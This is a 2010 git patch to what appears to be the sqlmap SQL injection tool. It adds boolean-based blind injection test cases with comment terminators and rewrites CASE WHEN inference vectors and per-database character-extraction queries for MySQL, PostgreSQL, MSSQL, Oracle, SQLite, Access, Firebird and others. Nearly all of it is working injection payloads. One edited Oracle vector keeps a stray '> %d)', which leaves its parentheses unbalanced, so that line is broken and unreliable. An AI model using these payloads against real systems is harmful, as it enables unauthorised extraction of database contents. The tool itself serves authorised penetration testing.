From 41e1b95c6c6d5da2e37445cb9bb402a212023c1b Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Sun, 5 Dec 2010 11:25:44 +0000
Subject: [PATCH] Minor code refactoring and finally make exploitation work
 also on OR boolean-based injections

---
 lib/core/agent.py |  4 +---
 xml/payloads.xml  | 54 ++++++++++++++++++++++++++++++++++++++++-------
 xml/queries.xml   | 18 ++++++++--------
 3 files changed, 56 insertions(+), 20 deletions(-)

diff --git a/lib/core/agent.py b/lib/core/agent.py
index 02e4a66e4..a177d5fcb 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -213,9 +213,7 @@ class Agent:
             payload = payload.replace("[ORIGVALUE]", origvalue)
 
         if kb.dbms is not None:
-            # NOTE: ugly hack due to queries.xml's <inference> tag
-            # starting with 'AND ' string
-            inferenceQuery = queries[kb.dbms].inference.query[4:]
+            inferenceQuery = queries[kb.dbms].inference.query
             payload = payload.replace("[INFERENCE]", inferenceQuery)
 
         return payload
diff --git a/xml/payloads.xml b/xml/payloads.xml
index 35483c1b5..73cd4a8d3 100644
--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -402,6 +402,7 @@ Formats:
         <risk>1</risk>
         <clause>1</clause>
         <where>1</where>
+        <vector>AND [INFERENCE]</vector>
         <request>
             <payload>AND [RANDNUM]=[RANDNUM]</payload>
         </request>
@@ -410,6 +411,40 @@ Formats:
         </response>
     </test>
 
+    <test>
+        <title>AND boolean-based blind - WHERE clause (MySQL comment)</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND [INFERENCE]</vector>
+        <request>
+            <payload>AND [RANDNUM]=[RANDNUM]</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
+        </response>
+    </test>
+
+    <test>
+        <title>AND boolean-based blind - WHERE clause (Generic comment)</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND [INFERENCE]</vector>
+        <request>
+            <payload>AND [RANDNUM]=[RANDNUM]</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
+        </response>
+    </test>
+
    <test>
         <title>OR boolean-based blind - WHERE clause</title>
         <stype>1</stype>
@@ -417,6 +452,7 @@ Formats:
         <risk>3</risk>
         <clause>1</clause>
         <where>2</where>
+        <vector>OR [INFERENCE]</vector>
         <request>
             <payload>OR [RANDNUM]=[RANDNUM1]</payload>
         </request>
@@ -432,6 +468,7 @@ Formats:
         <risk>3</risk>
         <clause>1</clause>
         <where>2</where>
+        <vector>OR [INFERENCE]</vector>
         <request>
             <payload>OR [RANDNUM]=[RANDNUM1]</payload>
             <comment>#</comment>
@@ -451,6 +488,7 @@ Formats:
         <risk>3</risk>
         <clause>1</clause>
         <where>2</where>
+        <vector>OR [INFERENCE]</vector>
         <request>
             <payload>OR [RANDNUM]=[RANDNUM1]</payload>
             <comment>--</comment>
@@ -488,7 +526,7 @@ Formats:
         <risk>1</risk>
         <clause>2,3</clause>
         <where>3</where>
-        <vector>(SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</vector>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</vector>
         <request>
             <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
         </request>
@@ -508,7 +546,7 @@ Formats:
         <risk>1</risk>
         <clause>2,3</clause>
         <where>3</where>
-        <vector>(SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
         <request>
             <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
         </request>
@@ -527,7 +565,7 @@ Formats:
         <risk>1</risk>
         <clause>3</clause>
         <where>3</where>
-        <vector>(SELECT (CASE WHEN (ASCII(SUBSTRING((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
         <request>
             <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
         </request>
@@ -546,7 +584,7 @@ Formats:
         <risk>1</risk>
         <clause>3</clause>
         <where>3</where>
-        <vector>(SELECT (CASE WHEN (ASCII(SUBSTR((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</vector>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) > %d) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</vector>
         <request>
             <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</payload>
         </request>
@@ -586,7 +624,7 @@ Formats:
         <risk>1</risk>
         <clause>2,3</clause>
         <where>1</where>
-        <vector>, (SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</vector>
+        <vector>, (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</vector>
         <request>
             <payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
         </request>
@@ -606,7 +644,7 @@ Formats:
         <risk>1</risk>
         <clause>2,3</clause>
         <where>1</where>
-        <vector>, (SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
+        <vector>, (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
         <request>
             <payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
         </request>
@@ -625,7 +663,7 @@ Formats:
         <risk>1</risk>
         <clause>3</clause>
         <where>1</where>
-        <vector>, (SELECT (CASE WHEN (ASCII(SUBSTRING((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
+        <vector>, (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
         <request>
             <payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
         </request>
@@ -644,7 +682,7 @@ Formats:
         <risk>1</risk>
         <clause>3</clause>
         <where>1</where>
-        <vector>, (SELECT (CASE WHEN (ASCII(SUBSTR((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</vector>
+        <vector>, (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</vector>
         <request>
             <payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</payload>
         </request>
diff --git a/xml/queries.xml b/xml/queries.xml
index 25220a0ca..a69ce77d7 100644
--- a/xml/queries.xml
+++ b/xml/queries.xml
@@ -24,7 +24,7 @@
         <timedelay query="SELECT SLEEP(%d)" query2="SELECT BENCHMARK(5000000, MD5('%d'))"/>
         <substring query="MID((%s), %d, %d)"/>
         <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
-        <inference query="AND ORD(MID((%s), %d, 1)) > %d"/>
+        <inference query="ORD(MID((%s), %d, 1)) > %d"/>
         <banner query="VERSION()"/>
         <current_user query="CURRENT_USER()"/>
         <current_db query="DATABASE()"/>
@@ -96,7 +96,7 @@
         <timedelay query="SELECT PG_SLEEP(%d)" query2="SELECT 'sqlmap' WHERE exists(SELECT * FROM generate_series(1, 300000%d))" query3="CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep(%d)"/>
         <substring query="SUBSTR((%s)::text, %d, %d)"/>
         <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
-        <inference query="AND ASCII(SUBSTR((%s)::text, %d, 1)) > %d"/>
+        <inference query="ASCII(SUBSTR((%s)::text, %d, 1)) > %d"/>
         <banner query="SELECT VERSION()"/>
         <current_user query="SELECT CURRENT_USER"/>
         <current_db query="SELECT CURRENT_DATABASE()"/>
@@ -162,7 +162,7 @@
         <timedelay query="WAITFOR DELAY '0:0:%d'"/>
         <substring query="SUBSTRING((%s), %d, %d)"/>
         <case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
-        <inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
+        <inference query="ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
         <banner query="SELECT @@VERSION"/>
         <current_user query="SELECT SYSTEM_USER"/>
         <current_db query="SELECT DB_NAME()"/>
@@ -226,7 +226,7 @@
         <timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="EXEC DBMS_LOCK.SLEEP(%d.00)" query3="EXEC USER_LOCK.SLEEP(%d.00)"/>
         <substring query="SUBSTR((%s), %d, %d)"/>
         <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) FROM DUAL"/>
-        <inference query="AND ASCII(SUBSTR((%s), %d, 1)) > %d"/>
+        <inference query="ASCII(SUBSTR((%s), %d, 1)) > %d"/>
         <banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/>
         <current_user query="SELECT USER FROM DUAL"/>
         <current_db query="SELECT SYS.DATABASE_NAME FROM DUAL"/>
@@ -306,7 +306,7 @@
         <timedelay query="SELECT LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(1000000%d))))"/>
         <substring query="SUBSTR((%s), %d, %d)"/>
         <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
-        <inference query="AND SUBSTR((%s), %d, 1) > '%s'"/>
+        <inference query="SUBSTR((%s), %d, 1) > '%s'"/>
         <banner query="SELECT SQLITE_VERSION()"/>
         <current_user/>
         <current_db/>
@@ -353,7 +353,7 @@
         <banner/>
         <current_user query="SELECT CURRENTUSER()"/>
         <current_db/>
-        <inference query="AND ASC(MID((%s), %d, 1)) > %d"/>
+        <inference query="ASC(MID((%s), %d, 1)) > %d"/>
         <is_dba query="IIF(CURRENTUSER()='Admin',1,0)"/>
         <dbs/>
         <tables>
@@ -389,7 +389,7 @@
             <inband query="SELECT DISTINCT RDB$USER FROM RDB$USER_PRIVILEGES"/>
             <blind query="SELECT FIRST 1 SKIP %d DISTINCT(RDB$USER) FROM RDB$USER_PRIVILEGES" count="SELECT COUNT(DISTINCT(RDB$USER)) FROM RDB$USER_PRIVILEGES"/>
         </users>
-        <inference query="AND ASCII_VAL(SUBSTRING((%s) FROM %d FOR 1)) > %d"/>
+        <inference query="ASCII_VAL(SUBSTRING((%s) FROM %d FOR 1)) > %d"/>
         <is_dba query="CURRENT_USER='SYSDBA'"/>
         <tables>
             <inband query="SELECT RDB$RELATION_NAME FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG = 0)"/>
@@ -432,7 +432,7 @@
         <current_db query="SELECT DATABASE() FROM DUAL"/>
         <order query="ORDER BY %s ASC"/>
         <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
-        <inference query="AND SUBSTR((%s), %d, 1) > '%s'"/>
+        <inference query="SUBSTR((%s), %d, 1) > '%s'"/>
         <delimiter query=","/>
         <substring query="SUBSTR((%s), %d, %d)"/>
         <users>
@@ -473,7 +473,7 @@
         <timedelay query="WAITFOR DELAY '0:0:%d'"/>
         <substring query="SUBSTRING((%s), %d, %d)"/>
         <case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
-        <inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
+        <inference query="ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
         <banner query="SELECT @@VERSION"/>
         <current_user query="SELECT SUSER_NAME()"/>
         <current_db query="SELECT DB_NAME()"/>